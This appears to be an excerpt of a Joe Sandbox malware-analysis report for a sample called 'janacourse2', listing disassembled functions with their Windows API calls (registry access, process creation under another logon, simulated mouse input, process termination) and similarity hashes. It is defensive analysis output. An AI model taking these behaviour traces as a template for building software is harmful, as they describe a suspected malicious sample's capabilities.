                                                                                                            • Opcode ID: d9aa46f1f7de38cbbe3f3915fe69d7ed673338f651c1c0efb217984722441edb
                                                                                                            • Instruction ID: faf0c06a8c78864d18544db5e14937253d1f64a9ca001dba26d767ceb54ff67a
                                                                                                            • Opcode Fuzzy Hash: d9aa46f1f7de38cbbe3f3915fe69d7ed673338f651c1c0efb217984722441edb
                                                                                                            • Instruction Fuzzy Hash: 6F51F572A0029AAFEF258F66CC81EAF77A9EF547A0F144229FD05D7240DB34DC40E660
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                              • Part of subcall function 0103C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0103B6AE,?,?), ref: 0103C9B5
                                                                                                              • Part of subcall function 0103C998: _wcslen.LIBCMT ref: 0103C9F1
                                                                                                              • Part of subcall function 0103C998: _wcslen.LIBCMT ref: 0103CA68
                                                                                                              • Part of subcall function 0103C998: _wcslen.LIBCMT ref: 0103CA9E
                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0103BCCA
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0103BD25
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0103BD6A
                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0103BD99
                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0103BDF3
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0103BDFF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 1120388591-0
                                                                                                            • Opcode ID: ba2876002bc1981a50d6085aeb3f8846b52158fa9b54654324649dcc6e45f921
                                                                                                            • Instruction ID: 2b0e30936de854faa575d7bb7fff38d4bae99d157c43865404b696fa122200e1
                                                                                                            • Opcode Fuzzy Hash: ba2876002bc1981a50d6085aeb3f8846b52158fa9b54654324649dcc6e45f921
                                                                                                            • Instruction Fuzzy Hash: 7081B570208241AFD714EF24C885E6ABBE9FF84308F14459DF5954B292DB35ED45CF92
                                                                                                            APIs
                                                                                                            • VariantInit.OLEAUT32(00000035), ref: 0100F7B9
                                                                                                            • SysAllocString.OLEAUT32(00000001), ref: 0100F860
                                                                                                            • VariantCopy.OLEAUT32(0100FA64,00000000), ref: 0100F889
                                                                                                            • VariantClear.OLEAUT32(0100FA64), ref: 0100F8AD
                                                                                                            • VariantCopy.OLEAUT32(0100FA64,00000000), ref: 0100F8B1
                                                                                                            • VariantClear.OLEAUT32(?), ref: 0100F8BB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                                                                            • String ID:
                                                                                                            • API String ID: 3859894641-0
                                                                                                            • Opcode ID: d2cf85beb392c4c797557087cfd5e3c1ec051cdfe5f3d23246489d6cc95859da
                                                                                                            • Instruction ID: b8c252ba667cdc0c42d92e7b5ab9960f8fb49a9428a87acb589689e1a1c1ca6e
                                                                                                            • Opcode Fuzzy Hash: d2cf85beb392c4c797557087cfd5e3c1ec051cdfe5f3d23246489d6cc95859da
                                                                                                            • Instruction Fuzzy Hash: AC512435600312BBEF36AB65D885B6DB3E8EF45310F14845AE942DF2C5DB748840EBA7
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB7620: _wcslen.LIBCMT ref: 00FB7625
                                                                                                              • Part of subcall function 00FB6B57: _wcslen.LIBCMT ref: 00FB6B6A
                                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 010294E5
                                                                                                            • _wcslen.LIBCMT ref: 01029506
                                                                                                            • _wcslen.LIBCMT ref: 0102952D
                                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 01029585
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$FileName$OpenSave
                                                                                                            • String ID: X
                                                                                                            • API String ID: 83654149-3081909835
                                                                                                            • Opcode ID: 85321f1c72d79b7a408cf7ab6f9db316d5148c00f606da56c866609b75f83b29
                                                                                                            • Instruction ID: 000f5e559b08a338f50056a20ec1322aa5f8ddca5425870be2d4c7fa18a83911
                                                                                                            • Opcode Fuzzy Hash: 85321f1c72d79b7a408cf7ab6f9db316d5148c00f606da56c866609b75f83b29
                                                                                                            • Instruction Fuzzy Hash: 61E1B4716083218FD724DF25C881AAEB7E4BF85314F18856DF9899B2A2DB35DD04CF92
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FC9BB2
                                                                                                            • BeginPaint.USER32(?,?,?), ref: 00FC9241
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00FC92A5
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00FC92C2
                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FC92D3
                                                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 00FC9321
                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 010071EA
                                                                                                              • Part of subcall function 00FC9339: BeginPath.GDI32(00000000), ref: 00FC9357
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                            • String ID:
                                                                                                            • API String ID: 3050599898-0
                                                                                                            • Opcode ID: c46302045d1f4bb49cedd9a1fd13179838241d3ca5e478fa87909b980a1ba58e
                                                                                                            • Instruction ID: 7da136d0e22551f5e3423e744b74df9cbf48989d59b267dbd0ace3197f03934e
                                                                                                            • Opcode Fuzzy Hash: c46302045d1f4bb49cedd9a1fd13179838241d3ca5e478fa87909b980a1ba58e
                                                                                                            • Instruction Fuzzy Hash: D541A271109201AFE721DF18C989FAA7BA9FF45320F04066DF9D4871E1C77AA845EB61
                                                                                                            APIs
                                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0102080C
                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 01020847
                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 01020863
                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 010208DC
                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 010208F3
                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 01020921
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                            • String ID:
                                                                                                            • API String ID: 3368777196-0
                                                                                                            • Opcode ID: dd5e477ba0af5de2c1d939ebf9aa07286cd98aaff8971b600b64f348115f28af
                                                                                                            • Instruction ID: c7f5e20f13c9c2346443fbf6fe2dfcf9a7c220c7ff622466f78f5baaff8db022
                                                                                                            • Opcode Fuzzy Hash: dd5e477ba0af5de2c1d939ebf9aa07286cd98aaff8971b600b64f348115f28af
                                                                                                            • Instruction Fuzzy Hash: 8C41CE71A00205EFEF14AF54DD81A6AB7B9FF04300F0480A9FD00AA29BDB75DE14DBA0
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0100F3AB,00000000,?,?,00000000,?,0100682C,00000004,00000000,00000000), ref: 0104824C
                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 01048272
                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 010482D1
                                                                                                            • ShowWindow.USER32(00000000,00000004), ref: 010482E5
                                                                                                            • EnableWindow.USER32(00000000,00000001), ref: 0104830B
                                                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0104832F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 642888154-0
                                                                                                            • Opcode ID: fe1be939eb93577da544e9f1b8965cf32d664d639295ba260cd51e7d17e446ca
                                                                                                            • Instruction ID: 0665acbd40f1318a130acc5fa02f0a40509473ca6d30bf1dba349c34ac2a6c96
                                                                                                            • Opcode Fuzzy Hash: fe1be939eb93577da544e9f1b8965cf32d664d639295ba260cd51e7d17e446ca
                                                                                                            • Instruction Fuzzy Hash: 6141B7B4601644AFEB61CF58C6C9BE87BE0BF09715F1885F6E6D84B263C3366441CB50
                                                                                                            APIs
                                                                                                            • GetForegroundWindow.USER32(?,?,00000000), ref: 010322E8
                                                                                                              • Part of subcall function 0102E4EC: GetWindowRect.USER32(?,?), ref: 0102E504
                                                                                                            • GetDesktopWindow.USER32 ref: 01032312
                                                                                                            • GetWindowRect.USER32(00000000), ref: 01032319
                                                                                                            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 01032355
                                                                                                            • GetCursorPos.USER32(?), ref: 01032381
                                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 010323DF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                            • String ID:
                                                                                                            • API String ID: 2387181109-0
                                                                                                            • Opcode ID: b71f016fe205c505e3097a6ccf34b29de3fdb796ff9b0888a15d1410bcc73d40
                                                                                                            • Instruction ID: f296174905ce5a3d0fb34751efb2433791996f312031a76fde2f0c393be9c36a
                                                                                                            • Opcode Fuzzy Hash: b71f016fe205c505e3097a6ccf34b29de3fdb796ff9b0888a15d1410bcc73d40
                                                                                                            • Instruction Fuzzy Hash: C531CFB2505305ABD721DF18C944A9BBBEDFFC8310F004A19F9C597181DB35EA08CB92
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 01014C95
                                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 01014CB2
                                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 01014CEA
                                                                                                            • _wcslen.LIBCMT ref: 01014D08
                                                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 01014D10
                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 01014D1A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                            • String ID:
                                                                                                            • API String ID: 72514467-0
                                                                                                            • Opcode ID: 639d229ac0acf12b071a3e7cd7b0d82affc15c25de4ffbc2f8f0757fc53006c8
                                                                                                            • Instruction ID: 087dcd25107fb5444c78694dd6fb639438f68a6eacc45400183a5c746f6858c1
                                                                                                            • Opcode Fuzzy Hash: 639d229ac0acf12b071a3e7cd7b0d82affc15c25de4ffbc2f8f0757fc53006c8
                                                                                                            • Instruction Fuzzy Hash: C52149712042047BFB656B39AD49E7F7BDDDF49710F00806DF845CA1A6EB79D80093A0
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB3A97,?,?,00FB2E7F,?,?,?,00000000), ref: 00FB3AC2
                                                                                                            • _wcslen.LIBCMT ref: 0102587B
                                                                                                            • CoInitialize.OLE32(00000000), ref: 01025995
                                                                                                            • CoCreateInstance.OLE32(0104FCF8,00000000,00000001,0104FB68,?), ref: 010259AE
                                                                                                            • CoUninitialize.OLE32 ref: 010259CC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                            • String ID: .lnk
                                                                                                            • API String ID: 3172280962-24824748
                                                                                                            APIs
                                                                                                              • Part of subcall function 01010FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01010FCA
                                                                                                              • Part of subcall function 01010FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01010FD6
                                                                                                              • Part of subcall function 01010FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01010FE5
                                                                                                              • Part of subcall function 01010FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01010FEC
                                                                                                              • Part of subcall function 01010FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 01011002
                                                                                                            • GetLengthSid.ADVAPI32(?,00000000,01011335), ref: 010117AE
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 010117BA
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 010117C1
                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 010117DA
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,01011335), ref: 010117EE
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 010117F5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                            • String ID:
                                                                                                            • API String ID: 3008561057-0
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 010114FF
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 01011506
                                                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 01011515
                                                                                                            • CloseHandle.KERNEL32(00000004), ref: 01011520
                                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0101154F
                                                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 01011563
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                            • String ID:
                                                                                                            • API String ID: 1413079979-0
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,00FD3379,00FD2FE5), ref: 00FD3390
                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FD339E
                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FD33B7
                                                                                                            • SetLastError.KERNEL32(00000000,?,00FD3379,00FD2FE5), ref: 00FD3409
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3852720340-0
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,00FE5686,00FF3CD6,?,00000000,?,00FE5B6A,?,?,?,?,?,00FDE6D1,?,01078A48), ref: 00FE2D78
                                                                                                            • _free.LIBCMT ref: 00FE2DAB
                                                                                                            • _free.LIBCMT ref: 00FE2DD3
                                                                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,00FDE6D1,?,01078A48,00000010,00FB4F4A,?,?,00000000,00FF3CD6), ref: 00FE2DE0
                                                                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,00FDE6D1,?,01078A48,00000010,00FB4F4A,?,?,00000000,00FF3CD6), ref: 00FE2DEC
                                                                                                            • _abort.LIBCMT ref: 00FE2DF2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 3160817290-0
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FC9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FC9693
                                                                                                              • Part of subcall function 00FC9639: SelectObject.GDI32(?,00000000), ref: 00FC96A2
                                                                                                              • Part of subcall function 00FC9639: BeginPath.GDI32(?), ref: 00FC96B9
                                                                                                              • Part of subcall function 00FC9639: SelectObject.GDI32(?,00000000), ref: 00FC96E2
                                                                                                            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 01048A4E
                                                                                                            • LineTo.GDI32(?,00000003,00000000), ref: 01048A62
                                                                                                            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 01048A70
                                                                                                            • LineTo.GDI32(?,00000000,00000003), ref: 01048A80
                                                                                                            • EndPath.GDI32(?), ref: 01048A90
                                                                                                            • StrokePath.GDI32(?), ref: 01048AA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                            • String ID:
                                                                                                            • API String ID: 43455801-0
                                                                                                            APIs
                                                                                                            • GetDC.USER32(00000000), ref: 01015218
                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 01015229
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01015230
                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 01015238
                                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0101524F
                                                                                                            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 01015261
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDevice$Release
                                                                                                            • String ID:
                                                                                                            • API String ID: 1035833867-0
                                                                                                            APIs
                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FB1BF4
                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00FB1BFC
                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FB1C07
                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FB1C12
                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00FB1C1A
                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FB1C22
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Virtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4278518827-0
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0101EB30
                                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0101EB46
                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 0101EB55
                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0101EB64
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0101EB6E
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0101EB75
                                                                                                            Similarity
                                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 839392675-0
                                                                                                            APIs
                                                                                                            • GetClientRect.USER32(?), ref: 01007452
                                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 01007469
                                                                                                            • GetWindowDC.USER32(?), ref: 01007475
                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 01007484
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 01007496
                                                                                                            • GetSysColor.USER32(00000005), ref: 010074B0
                                                                                                            Similarity
                                                                                                            • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 272304278-0
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0101187F
                                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 0101188B
                                                                                                            • CloseHandle.KERNEL32(?), ref: 01011894
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0101189C
